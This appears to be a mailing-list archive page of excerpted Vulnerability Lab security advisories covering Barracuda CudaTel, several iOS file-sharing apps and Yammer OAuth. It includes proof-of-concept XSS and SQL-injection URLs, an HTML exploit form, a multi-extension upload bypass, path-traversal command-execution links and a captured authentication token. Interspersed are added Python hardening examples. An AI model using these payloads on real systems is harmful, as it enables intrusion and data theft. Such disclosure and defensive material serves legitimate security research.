h3Queue Monitor a class=ops opOpenQueueWallboard href=#Large View in 
New Window/a/h3

PoC:
http://cudatel.127.0.0.1:1338/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE
 SCRIPT CODE!]%20%3C#



1.3
Review: Eventlog  eventlog - Web login attempt fail (Exception Handling) - 
Listing  bbx_eventlog_message
- 
bbx_eventlog_date_time: 2012-11-26 15:25:59
bbx_eventlog_email_sent: 0
bbx_eventlog_fullname: Admin
bbx_eventlog_id: 2823
bbx_eventlog_ip_addr: 178.200.236.201
bbx_eventlog_message: Web login attempt fail for 
[x]%20%20split%20%20[CLIENT-SIDE SCRIPT CODE!])  from 178.200.236.201
bbx_eventlog_priority: notice
bbx_eventlog_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) 
Gecko/17.0 Firefox/17.0
bbx_user_id: 1
  - 

PoC:
http://cudatel.127.0.0.1:1338/gui/eventlog/eventlog?%3Cx%3E%20%20%20%20%22%3E%3C[CLIENT-SIDE
 SCRIPT CODE!]%20%3C


Reference(s):
http://cudatel.ptest.cudasvc.com/gui/route/route
http://cudatel.ptest.cudasvc.com/ajax-html/queues_wall_stub.html
http://cudatel.ptest.cudasvc.com/gui/eventlog/eventlog


Risk:
=
The security risk of the (multiple) client side input validation
vulnerabilities is estimated as medium.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(b...@vulnerability-lab.com)






Download Lite v4.3 iOS - Persistent File Web Vulnerability

2013-07-19 Thread Vulnerability Lab
 is processing to open the index listing.



Solution:
=
The vulnerability can be patched by a secure encoding and parse of the file 
name in the main file dir listing index module of the application.


Risk:
=
The security risk of the persistent input validation web vulnerability is 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)






Barracuda LB, SVF, WAF & WEF - Multiple Vulnerabilities

2013-07-22 Thread Vulnerability Lab


Solution:
=
The vulnerabilities can be patched by parsing the affected (displayed)
certificate value(s) output listing. Restrict and parse the input fields
(function) of trusted and self-signed certificate values to prevent future
executions out of the certificate context.


Risk:
=
The security risk of the persistent input validation web vulnerabilities is
estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)






Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability

2013-07-22 Thread Vulnerability Lab
 interaction.
For demonstration or reproduce ...

Standard Request: Row 100
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509since=1+daysearch_string=rows=100page=1sortby=end_timestampsortorder=desc

Standard Request: Output
--- 1.
{count:0,page:1,cdr:[],rows:100}


Manipulated Request: 
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
_=1353973149509since=1+daysearch_string=rows=100page='1+1%27[SQL-Injection!]%27--sortby=end_timestampsortorder=desc
... or
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
%20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows='1+1%27[SQL-Injection!]%27--page=1sortby=end_timestampsortorder=desc


Manipulated Output:
--- 1.

cdr: []

count: 0
page: 1
rows: 1+2


--- 1.
cdr: []

count: 1+2'
page: 
  - '1335
  - '1336
  - '1337
  - '1
rows: -1+1'[SQL-Injection!]'--


Exploit (PoC):

htmlheadbodymeta http-equiv=Content-Type content=text/html; 
charset=iso-8859-9
titleBarracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection 
[PROOF OF CONCEPT]/title
script language=JavaScript
var path=/gui/cdr/cdr
var 
adres=?%20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows=
var domain =http://cudatel.127.0.0.1:1337;
var sql = '1+1%27[SQL-Injection!]%27--  
function command(){
if (document.rfi.target1.value==){
alert(NOPE!);
return false;
}  
rfi.action= document.rfi.target1.value+path+adres+domain+sql;
rfi.submit();
}
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Barracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection Exploit
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Vulnerability Research Laboratory (www.vulnerability-lab.com)
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD.  Stealthwalker
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/script/headbody bgcolor=#00 link=#99
centerp align=centerbfont face=Verdana size=2 
color=#006633Barracuda Networks CudaTel [CDR] (ROWPAGE) 
- Remote SQL-Injection Exploit/font
/b/pform method=post target=getting name=rfi 
onSubmit=command();div align=left
pbfont face=Arial size=2 color=#006633VICTIM:/font/b
input type=text name=target1 size=53 style=background-color: #006633 
onMouseOver=javascript:this.style.background='#808080'; 
onMouseOut=javascript:this.style.background='#808000';/p
pbfont face=Arial size=2 color=#006633EXAMPLE:/fontfont 
face=Arial size=2 color=#808080  
HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]//font/b/p/div
p align=leftinput type=submit value=Execute INPUT name=B1
/pp align=leftinput type=reset value=Clear ALL 
name=B2/p/formpbr
iframe name=getting height=337 width=633 scrolling=yes 
frameborder=0/iframe/pdiv align=left
  p align=centerbfont face=Verdana size=2 
color=#008000VULNERABILITY-LAB a 
href=mailto:resea...@vulnerability-lab.com;
BKM/a/font/b/p/div/center/body/html


1.2
The client-side input validation vulnerability can be exploited by remote 
attackers without an application user account and with medium user 
interaction required.
For demonstration or to reproduce ...

PoC:
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509since=1+daysearch_string=rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]page=1sortby=end_timestampsortorder=desc

http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509since=1+daysearch_string=rows=100page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]sortby=end_timestampsortorder=desc

Note: We only verified the bug with the same exception in a non-parsed 
parameter, but the bug itself is located in all areas of the invalid exception.


Solution:
=
1.1
To patch the SQL injection, the rows and page parameters of the cdr module 
must be parsed (validated) before they are used.

1.2
To fix the client-side XSS vulnerability, parse and encode the rows parameter 
and restrict the input.
Encode the affected exception-handling output listing when it displays 
invalid input values.

Note: Barracuda Networks provided an update of version 2.6.002.040 to 
v2.6.003.x to all clients and customers in the bn customer area.
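Added example, not code from the advisory or from Barracuda Networks: the kind of check the Solution above calls for, written in Python against an in-memory SQLite table (the table name, its columns and the 500-row upper limit are assumptions made for the example). It rejects any rows/page value that is not a plain integer before the query is built, binds the validated values as parameters instead of splicing them into SQL, and HTML-escapes the echoed value in the error listing so the iframe payload from 1.2 is shown as text rather than rendered.

```python
import html
import re
import sqlite3


class InvalidParameter(ValueError):
    """Raised when rows or page is not a plain positive integer."""

    def __init__(self, name, value):
        super().__init__(f"invalid {name}")
        self.name = name
        self.value = value


# Decimal digits only: no quotes, no operators, no comment sequences.
_INT_RE = re.compile(r"^[0-9]{1,6}$")


def parse_paging(rows, page, max_rows=500):
    """Validate rows/page before they get anywhere near SQL.

    Anything that is not a short run of digits (for instance the
    1+1'[SQL-Injection!]'-- value from the PoC) is rejected together with
    the name and value of the offending parameter."""
    checked = {}
    for name, value in (("rows", rows), ("page", page)):
        value = "" if value is None else str(value)
        if not _INT_RE.match(value):
            raise InvalidParameter(name, value)
        checked[name] = int(value)
    if not 1 <= checked["rows"] <= max_rows:        # assumed upper bound
        raise InvalidParameter("rows", rows)
    if checked["page"] < 1:
        raise InvalidParameter("page", page)
    return checked["rows"], checked["page"]


def build_query_unsafe(rows, page):
    """The 'before' pattern (string splicing). Returned as text only and never
    executed here; it exists to show that an unvalidated value lands in SQL."""
    return ("SELECT id, caller FROM cdr ORDER BY end_timestamp DESC "
            f"LIMIT {rows} OFFSET ({page}-1)*{rows}")


def query_cdr(conn, rows, page):
    """Hardened variant: validated integers bound as query parameters."""
    r, p = parse_paging(rows, page)
    cur = conn.execute(
        "SELECT id, caller FROM cdr ORDER BY end_timestamp DESC LIMIT ? OFFSET ?",
        (r, (p - 1) * r),
    )
    records = [{"id": i, "caller": c} for i, c in cur.fetchall()]
    return {"count": len(records), "page": p, "rows": r, "cdr": records}


def render_error(name, value):
    """Error listing for invalid input. The echoed value is HTML-escaped, so an
    <iframe> or <script> payload in rows/page is displayed as text."""
    return (f'<p class="error">Invalid value for {html.escape(name)}: '
            f'{html.escape(str(value), quote=True)}</p>')


def handle_request(conn, rows, page):
    """Returns (status, body): a dict on success, escaped HTML on rejection."""
    try:
        return 200, query_cdr(conn, rows, page)
    except InvalidParameter as e:
        return 400, render_error(e.name, e.value)


def make_sample_db():
    """Constructed in-memory stand-in for the cdr table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cdr (id INTEGER PRIMARY KEY, caller TEXT, "
                 "end_timestamp INTEGER)")
    conn.executemany(
        "INSERT INTO cdr (caller, end_timestamp) VALUES (?, ?)",
        [("1001", 1353973000 + i) for i in range(250)],
    )
    return conn


if __name__ == "__main__":
    db = make_sample_db()
    print(handle_request(db, "100", "1")[1]["count"])            # 100
    print(handle_request(db, "100", "1+1'[SQL-Injection!]'--"))  # 400 + escaped error
```

The regex is deliberately stricter than int() alone: int() would accept leading whitespace, a sign, or underscores, none of which a paging parameter needs, and every rejected value reaches the browser only through html.escape.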


Risk:
=
1.1
The security risk of the remote SQL injection web vulnerability is estimated 
as critical.

1.2
The security risk of the client side input validation web vulnerability is 
estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)



Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities

2013-07-22 Thread Vulnerability Lab




Photo Server 2.0 iOS - Multiple Critical Vulnerabilities

2013-07-23 Thread Vulnerability Lab
 exploitation of the vulnerability results in unauthorized file 
access because of a compromise after the upload of web-shells.

Vulnerable Module(s):
[+] Upload (Files)

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Index File Dir Listing


Proof of Concept:
=
1.1
The local command/path injection web vulnerability can be exploited by local 
attackers with device access and without user interaction.
For demonstration or to reproduce ...

PoC:

htmlhead
meta http-equiv=content-type content=text/html; charset=UTF-8
titleiPad ¥337 360* [COMMAND/PATH INJECT VULNERABILITY] Photo Server 
app's Web Browser Interface Page/title/headbody
centerh2iPad ¥337 360* [COMMAND/PATH INJECT VULNERABILITY]'s
Photo Server App Web Browser Interface 
Page/h2/centerform action= method=post 
enctype=multipart/form-data name=form1 
id=form1labelChoose QuickTime (.MOV) or JPEG (.JPG or 
.jpeg) file to upload to iPad ¥337 360* iframe src=a: 
input type=file name=file id=file value=Choose file... 
//labellabelinput type=submit name=button 
id=button value=Upload 
//label/formhrpiSave videos 
or photos of the links below to hard drive by using context menu's 
(mouse right-click) Save Link As ... 
function./ihrh1The Video and Photo 
List/h1
lia 
href='assets-library---asset/asset.PNG?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22ext=PNG'img


--- Request Session Log  ---

Status: 200[OK]

GET http://192.168.2.104:/vulnerabilitylab 
Load Flags[LOAD_DOCUMENT_URI  ] 
Content Size[3032] Mime Type[application/x-unknown-content-type]
   

Request Headers:
  
Host[192.168.2.104:]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Accept-Language[en-US,en;q=0.5]
  
Accept-Encoding[gzip, deflate]
  
DNT[1]
  

Referer
[http://192.168.2.104:/]
  
Connection[keep-alive]
   

Response Headers:
  
Accept-Ranges[bytes]
  Content-Length[3032]
  Date[So., 21 Jul 2013 10:13:51 GMT]





1.2
The file include web vulnerability can be exploited by remote attackers without 
an application user account and without user interaction.
For demonstration or to reproduce ...

PoC:
hrh1The Video and Photo List/h1
lia href=http://192.168.2.104:/assets-library---asset/../[File Include 
Vulnerability].PNG
?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22ext=PNGimg 
src=iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%2
0Web%20Browser%20Interface%20Page_files/../[File Include 
Vulnerability].PNGassets-library---asset/../[File Include Vulnerability].PNG
?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG/a



1.3
The arbitrary file upload vulnerability can be exploited by remote attackers 
without an application user account and without user interaction.
For demonstration or to reproduce ...

PoC:
hrh1The Video and Photo List/h1
lia 
href=http://192.168.2.104:/assets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG
?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22ext=PNGimg 
src=iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%2
0Web%20Browser%20Interface%20Page_files/pentester23.PNG.jpg.html.php.js.gif.PNGassets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG
?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG/a

Note: After the upload request, the attacker can open the localhost: web server 
again and access the folder by including the filename.


Solution:
=
1.1
The command/path injection web vulnerability can be patched by securely parsing 
or encoding the device name at the two index locations where it is displayed.

1.2
The file include web vulnerability can be patched by securely parsing the POST 
request when processing the upload of a manipulated file.
Also encode, filter or parse the output listing in the index that shows the 
existing file names.

1.3
Disallow multiple extensions by securely filtering the POST request when 
processing the upload of a file with multiple extensions.
Change the web app HTTP server settings and file access rights to prevent the 
execution of js, html and php files.
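Added example, not the Photo Server app's own code: an upload name policy and an escaped index listing in Python that implement 1.2 and 1.3 above. The allow-list of .mov/.jpg/.jpeg follows the upload prompt quoted in the PoC; the upload root directory, the stem character set and the assets/ link prefix are assumptions made for the example.

```python
import html
import os
import re

# Allow-list taken from the upload prompt in the PoC ("QuickTime (.MOV) or
# JPEG (.JPG or .jpeg)"); everything else, including double extensions, is refused.
ALLOWED_EXTENSIONS = {"mov", "jpg", "jpeg"}
# Stem policy (assumed): letters, digits, underscore, hyphen; 1..64 characters.
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload_name(filename):
    """Return a normalised 'stem.ext' for an acceptable name, or None.

    Rejected: any directory component ('/' or '\\', so '../' never gets through),
    more than one dot (so 'x.PNG.jpg.html.php.js.gif.PNG' is refused outright),
    stems outside _SAFE_STEM, and extensions outside the allow-list."""
    if not filename:
        return None
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base != filename:                 # a separator was present
        return None
    if base.count(".") != 1:             # exactly one extension
        return None
    stem, ext = base.split(".")
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS or not _SAFE_STEM.match(stem):
        return None
    return f"{stem}.{ext}"


def store_path(upload_root, filename):
    """Absolute destination under upload_root for a validated name, or None.

    The containment check is repeated on the resolved path so that a symlink
    inside the upload folder cannot redirect the write elsewhere."""
    safe = validate_upload_name(filename)
    if safe is None:
        return None
    root = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(root, safe))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def render_listing(names):
    """Index listing ('The Video and Photo List'): every stored name is
    HTML-escaped before it is placed in the href and the link text, so a
    name containing markup cannot inject into the page."""
    items = []
    for name in names:
        quoted = html.escape(name, quote=True)
        items.append(f'<li><a href="assets/{quoted}">{quoted}</a></li>')
    return "<ul>" + "".join(items) + "</ul>"


if __name__ == "__main__":
    print(validate_upload_name("holiday.JPG"))                                  # holiday.jpg
    print(validate_upload_name("pentester23.PNG.jpg.html.php.js.gif.PNG"))     # None
    print(render_listing(["clip.mov", "<b>x</b>.jpg"]))
```

Because the single-dot rule runs before the extension check, the server never has to reason about which of several extensions the HTTP server or the OS will honour; that question simply does not arise for stored files. The listing escape applies to names already on disk as well, which covers files uploaded before the fix.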



Risk:
=
1.1
The security risk of the command/path injection web vulnerability is estimated 
as high.

1.2
The security risk of the file include web vulnerability is estimated as 
critical.

1.3
The security risk of the arbitrary file upload vulnerability is estimated as 
high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)



iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability

2013-07-24 Thread Vulnerability Lab
!]/a.jpg 
id=img_PhotoSharp_Local_Photo_0 realurl= class=logoStart 
classname=logoStart/a
span class=spanAlbum classname=spanAlbumDefault 
Album/span/div/tdtd class=photoTd classname=photoTd
div id=PhotoSharp_Local_Document_0 class=watermarkStart 
classname=watermarkStart
a 
href=javascript:loadDir('%2Fu%2FPhotoSharp_Local_Document%3FisSystem%3D0','PhotoSharp_Local_Document_0','%2Fu%2FPhotoSharp_Local_Document');
img src=iPic%20Sharp_files/PhotoSharp_Local_Document_75_75.jpg 
id=img_PhotoSharp_Local_Document_0 realurl= 
class=logoStart classname=logoStart/aspan class=spanAlbum 
classname=spanAlbum[PERSISTENT INJECTED SCRIPT CODE!]/span/div/td
td class=photoTd classname=photoTd/tdtd class=photoTd 
classname=photoTd/tdtd class=photoTd classname=photoTd/td
td class=photoTd classname=photoTd/tdtd class=photoTd 
classname=photoTd/tdtd class=photoTd classname=photoTd/td
td class=photoTd classname=photoTd/td/tr


Solution:
=
The vulnerability can be patched by securely encoding the foldername item 
input.
Also encode, filter or parse the affected output at the file directory index 
listing location when it displays the item foldername.


Risk:
=
The security risk of the persistent input validation web vulnerability is 
estimated as medium.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)






WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability

2013-07-29 Thread Vulnerability Lab
]
   

Response Headers:
Content-Length[20217]
Server[MHttpServer/1.0.0]

--- Exploitation Request Session Logs ---



Reference(s): mHTTP Web-Server

http://localhost:1861/
http://localhost:1861/mjs.js
http://localhost:1861/aadd.htm
http://localhost:1861/afgetthum.ma




PoC Example:
[HOST]:[PORT]/[FILE].[MA]?[PARAM Q]=%5C[PATH 
VAR]/[DIRECTION]%5C[ID]%5C[DOCUMENTS PATH]%5C[LIBRARY FOLDER]%5C[LOCAL PATH 
WDisk]%5C[COMMAND EXECUTION]

PoC Link:
http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[COMMAND
 EXECUTION]


PoC: Exploit 1 - HTML

html
headbodytitleWebDisk v3.0.2 - Command Execution Vulnerability - Remote 
PoC/title
iframe 
src=http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA
56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION] width=800 height=800
/body/head
html

PoC: Exploit 2 - JS

script 
language=JavaScriptm='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%3Ctitle%3EWebDisk%20v3.0.2%20-%20Command%20Execution%20Vulnerability%20
-%20Remote%20PoC%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//localhost%3A1861/afgetthum.ma%3Fp%3D%255Cvar%255Cmobile%255CApplications
%255C8D137E49-3793-4C45-9A50-B8AF3AE7EA%0A56%255CDocuments%255CLibrary%255CWD%255C%5BCOMMAND%20EXECUTION%5D%20width%3D800%20height%3D800
%3E%0A%3C/body%3E%3C/head%3E%0A%3Chtml%3E';d=unescape(m);document.write(d);/script



Review Source: tdmid


td colspan=3 height=1hr class=spline/td
  /tr

  tr
td class=tdlefta href=img class=imgthum 
src=afico/files_txt.png/a/td
td class=tdmid[CODE EXECUTION VULNERABILITY!]/td
td class=tdright7-26 19:51br/br/a 
href=afdelete.ma?p=%5Cvar%5Cmobile%5CApplications
%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C%7C-%7C430429876.txtdelete/a/td
  /tr
  tr
td colspan=3  height=1hr class=spline //td
  /tr



Solution:
=
To fix the command execution, parse the p variable and encode the input on 
direct GET requests.
Also parse and encode the output listing of the file input in the main file 
directory index module.
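Added example, not WebDisk's own code: one way to confine the p parameter to the app's WD folder before it is used, in Python. The PoC above sends backslash-separated absolute paths, and the JS variant double-encodes them (%255C), so the function decodes repeatedly until the value is stable, normalises separators, and refuses absolute paths, drive prefixes and '..' segments. The WD root path and the three-round decoding limit are assumptions for the example.

```python
import posixpath
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3                       # assumed bound on nested encoding
_DRIVE_RE = re.compile(r"^[A-Za-z]:")


def decode_fully(value):
    """Undo repeated percent-encoding (the JS PoC double-encodes backslashes
    as %255C). Stops once a round no longer changes the string."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_subpath(p):
    """Map the p parameter onto a relative path inside the WD folder.

    Returns the normalised relative path ('' for the folder itself), or None
    when the value is absolute, climbs with '..', or still carries encoded or
    NUL bytes after decoding. A literal '%' in a name is refused as well,
    which is the price of treating leftover encoding as hostile."""
    if p is None:
        return None
    value = decode_fully(str(p))
    if "%" in value or "\x00" in value:
        return None
    value = value.replace("\\", "/")
    if value.startswith("/") or _DRIVE_RE.match(value):
        return None
    parts = [seg for seg in value.split("/") if seg not in ("", ".")]
    if any(seg == ".." for seg in parts):
        return None
    return "/".join(parts)


def resolve_under(root, p):
    """Absolute path for a request, or None. root is the app's WD folder (assumed)."""
    sub = safe_subpath(p)
    if sub is None:
        return None
    root = posixpath.normpath(root)
    return root if sub == "" else posixpath.join(root, sub)


if __name__ == "__main__":
    wd = "/app/Documents/Library/WD"          # assumed root
    print(resolve_under(wd, "photos%5C2013%5Cimg.jpg"))   # /app/Documents/Library/WD/photos/2013/img.jpg
    print(resolve_under(wd, "%5Cvar%5Cmobile%5Cx"))       # None
```

The check is purely lexical, so it can run before any filesystem access; pairing it with a realpath containment check at the point of use, as the upload example earlier on this page does, closes the symlink case as well.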


Risk:
=
The security risk of the remote command execution web application vulnerability 
is estimated as critical.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)






Microsoft Yammer Social Network - oAuth Bypass (Session Token) Vulnerability

2013-08-07 Thread Vulnerability Lab
, HEAD, POST, PUT, DELETE, TRACE, 
CONNECT, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, 
UNLOCK, VERSION-CONTROL, REPORT, CHECKOUT, CHECKIN, UNCHECKOUT, MKWORKSPACE, 
UPDATE, LABEL, MERGE, BASELINE-CONTROL, MKACTIVITY, ORDERPATCH, 
ACL, SEARCH, PATCH
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
Access-Control-Allow-Headers: Content-Type, X-Requested-With, NETWORK_ID, 
Authorization, X-CSRF-Token
Access-Control-Allow-Origin: https://ymodules.yammer.com
X-Runtime: 0.444532
X-Date: 1373316697937
Access-Control-Allow-Credentials: true
X-XSS-Protection: 1; mode=block
Content-Length: 70544

?xml version=1.0 encoding=UTF-8?
response
  meta
current-user-id10490568/current-user-id
direct-from-bodyfalse/direct-from-body
followed-user-ids
  followed-user-id10638646/followed-user-id
/followed-user-ids
feed-nameCompany Feed/feed-name
realtime
  channel-idMTozNTc3OTc6MzU3Nzk3/channel-id
  
authentication-token9mP6fBnFfNlUvZGG0Bwt5nUPJBxmlRqoaG3bMiBsMqJ4nKtWKi1OLVKyMjQwsTQwNbPQUcpLLSnPL8pWsjI2NTe3NNdRSq0oyCyqBCoxNje1t
DQ1sDSvBQCsgA8z/authentication-token
  urihttps://1-087.rt.yammer.com/cometd//uri
/realtime
feed-descjungletorch.com's public messages/feed-desc
older-availabletrue/older-available
followed-references
  followed-reference
typeopen_graph_object/type
id344060296338433/id
  /followed-reference
/followed-references
ymodules/
requested-poll-interval60/requested-poll-interval
  /meta
  references
reference
  typethread/type
  
web-urlhttps://www.yammer.com/jungletorch.com/#/Threads/show?threadId=289043199/web-url
  direct-messagefalse/direct-message
Connection: keep-alive



Solution:
=
TLS/SSL is the recommended approach to prevent any eavesdropping during the 
data exchange. Search engine bots crawling the site should be restricted 
from capturing sensitive URL parameters from user sessions. User notifications 
should also be enabled if an authentication request is performed through the 
HTTPS protocol. Furthermore, resource providers can limit the likelihood of a 
replay attack from a tampered request by implementing the protocol's nonce and 
timestamp attributes. The value of the oauth_nonce attribute is a randomly 
generated number used to sign the client request, and oauth_timestamp defines 
the retention timeframe of the nonce.

Insecure Storage of Secrets:
Protecting the integrity of the client credentials and token credentials works 
fairly well when it comes to storing them on servers: the secrets can be 
isolated and stored in a database or file system with proper access control, 
file permissions, physical security, and even database or disk encryption. For 
securing client credentials on mobile application clients, follow security 
best practices for storing sensitive, non-stale data such as application 
passwords and secrets.
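Added example, not Yammer's implementation: the nonce/timestamp replay check and the accompanying HMAC-SHA1 signature verification of OAuth 1.0 (RFC 5849) that the Solution describes, in Python. The consumer and token secrets, the 300-second timestamp window, the URL and the request parameters are constructed for the example; the ReplayGuard keeps its seen-nonce table in memory, which a real resource provider would back with shared storage.

```python
import base64
import hashlib
import hmac
import time
from urllib.parse import quote

# Constructed credentials for the example (not a real client's).
CONSUMER_SECRET = "example-consumer-secret"
TOKEN_SECRET = "example-token-secret"
TIMESTAMP_WINDOW = 300            # seconds of clock skew tolerated (assumed)


def _pct(s):
    """RFC 5849 section 3.6 percent-encoding: only unreserved characters bare."""
    return quote(str(s), safe="~")


def signature_base_string(method, url, params):
    normalized = "&".join(f"{_pct(k)}={_pct(v)}" for k, v in sorted(params.items()))
    return "&".join([method.upper(), _pct(url), _pct(normalized)])


def hmac_sha1_signature(method, url, params, consumer_secret, token_secret=""):
    """HMAC-SHA1 over the base string; params must exclude oauth_signature."""
    key = f"{_pct(consumer_secret)}&{_pct(token_secret)}".encode()
    base = signature_base_string(method, url, params).encode()
    return base64.b64encode(hmac.new(key, base, hashlib.sha1).digest()).decode()


class ReplayGuard:
    """Server-side nonce/timestamp check: a (consumer key, timestamp, nonce)
    triple is accepted once; timestamps outside the window are refused outright,
    which also bounds how long nonces must be remembered."""

    def __init__(self, window=TIMESTAMP_WINDOW, now=time.time):
        self.window = window
        self.now = now
        self._seen = {}               # (consumer_key, ts, nonce) -> expiry

    def _purge(self, t):
        self._seen = {k: exp for k, exp in self._seen.items() if exp > t}

    def check(self, consumer_key, timestamp, nonce):
        t = self.now()
        try:
            ts = int(timestamp)
        except (TypeError, ValueError):
            return False
        if not nonce or abs(t - ts) > self.window:
            return False
        self._purge(t)
        key = (consumer_key, ts, nonce)
        if key in self._seen:
            return False              # replay of an already-accepted request
        self._seen[key] = t + 2 * self.window
        return True


def sign_request(method, url, params, consumer_secret, token_secret):
    """Client side: attach oauth_signature computed over the other parameters."""
    signed = dict(params)
    signed["oauth_signature"] = hmac_sha1_signature(method, url, params,
                                                    consumer_secret, token_secret)
    return signed


def verify_request(guard, method, url, params, consumer_secret, token_secret):
    """Resource-provider side: signature first (constant-time compare), then the
    replay guard. Tampering with any parameter or reusing a nonce fails."""
    provided = params.get("oauth_signature")
    if not provided:
        return False
    unsigned = {k: v for k, v in params.items() if k != "oauth_signature"}
    expected = hmac_sha1_signature(method, url, unsigned, consumer_secret, token_secret)
    if not hmac.compare_digest(expected.encode(), str(provided).encode()):
        return False
    return guard.check(params.get("oauth_consumer_key"),
                       params.get("oauth_timestamp"),
                       params.get("oauth_nonce"))
```

Checking the signature before consulting the guard matters: an unsigned or mis-signed request must not be able to burn a legitimate client's nonce, and the nonce table only ever records requests that were cryptographically bound to a consumer key.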



Risk:
=
The security risk of this insecure OAuth implementation vulnerability is 
estimated as critical.


Credits:

Vulnerability Laboratory [Research Team] - Ateeq Khan (at...@evolution-sec.com)

